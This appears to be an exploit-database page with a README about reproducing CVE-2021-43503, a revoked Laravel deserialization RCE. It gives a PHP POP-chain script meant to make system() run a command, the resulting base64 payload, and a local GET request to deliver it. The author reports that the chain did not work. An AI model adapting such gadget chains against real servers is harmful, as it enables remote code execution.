## https://sploitus.com/exploit?id=31D7A39E-44FB-5F22-BA26-E964E26E0154
> **Warning**
> The vulnerability has been revoked
# Override
This is Abount [CVE-2021-43503](https://vulners.com/cve/CVE-2021-43503), I can not replicate this vulnerability through [exp](https://github.com/guoyanan1g/Laravel-vul/issues/2#issue-1045655892)
## Requirement
* PHP 7.1.*
* Composer <= 2.2.12
## Recover vulnerability
1. Startup service
```bash
composer install
cp .env.example .env
php artisan key:generate
php artisan serve # it will listening 8000 port in localhost
```
2. encode POP chain
```php
<?php
namespace Illuminate\Routing{
class PendingResourceRegistration{
protected $registrar;
protected $name;
protected $controller;
protected $options = [];
protected $registered = false;
public function __construct($b){
$this->registrar=$b;
}
}
}
namespace Illuminate\Queue\Capsule{
class Manager{
protected $manager;
public function __construct($c)
{
$this->manager->method=$c;
}
}
}
namespace Mockery{
class ClosureWrapper{
private $closure;
public function __construct(){
$this->closure="system";
}
}
}
namespace{
use Illuminate\Queue\Capsule\Manager;
use Illuminate\Routing\PendingResourceRegistration;
use Mockery\ClosureWrapper;
$c=new ClosureWrapper("mkdir hello");
$b=new Manager($c);
$a=new PendingResourceRegistration($b);
echo base64_encode(serialize($a));
}
```
> **Note**
>
> I repalce `urlencode(serialize($a))` with `base64_encode(serialize($a))`
>
> And I repalce `dir` with `mkdir hello` to reflect the successful execution of RCE
It will be output above(ignore Warning):
```
Tzo0NjoiSWxsdW1pbmF0ZVxSb3V0aW5nXFBlbmRpbmdSZXNvdXJjZVJlZ2lzdHJhdGlvbiI6NTp7czoxMjoiACoAcmVnaXN0cmFyIjtPOjMyOiJJbGx1bWluYXRlXFF1ZXVlXENhcHN1bGVcTWFuYWdlciI6MTp7czoxMDoiACoAbWFuYWdlciI7Tzo4OiJzdGRDbGFzcyI6MTp7czo2OiJtZXRob2QiO086MjI6Ik1vY2tlcnlcQ2xvc3VyZVdyYXBwZXIiOjE6e3M6MzE6IgBNb2NrZXJ5XENsb3N1cmVXcmFwcGVyAGNsb3N1cmUiO3M6Njoic3lzdGVtIjt9fX1zOjc6IgAqAG5hbWUiO047czoxMzoiACoAY29udHJvbGxlciI7TjtzOjEwOiIAKgBvcHRpb25zIjthOjA6e31zOjEzOiIAKgByZWdpc3RlcmVkIjtiOjA7fQ==
```
3. Test from GET of HTTP:
Access the http://localhost:8000/?ser=Tzo0NjoiSWxsdW1pbmF0ZVxSb3V0aW5nXFBlbmRpbmdSZXNvdXJjZVJlZ2lzdHJhdGlvbiI6NTp7czoxMjoiACoAcmVnaXN0cmFyIjtPOjMyOiJJbGx1bWluYXRlXFF1ZXVlXENhcHN1bGVcTWFuYWdlciI6MTp7czoxMDoiACoAbWFuYWdlciI7Tzo4OiJzdGRDbGFzcyI6MTp7czo2OiJtZXRob2QiO086MjI6Ik1vY2tlcnlcQ2xvc3VyZVdyYXBwZXIiOjE6e3M6MzE6IgBNb2NrZXJ5XENsb3N1cmVXcmFwcGVyAGNsb3N1cmUiO3M6Njoic3lzdGVtIjt9fX1zOjc6IgAqAG5hbWUiO047czoxMzoiACoAY29udHJvbGxlciI7TjtzOjEwOiIAKgBvcHRpb25zIjthOjA6e31zOjEzOiIAKgByZWdpc3RlcmVkIjtiOjA7fQ== through the browser.
![Access exp case](./resources/image/access-exp-case.png)
It did not successfully create `hello/` in `public/ `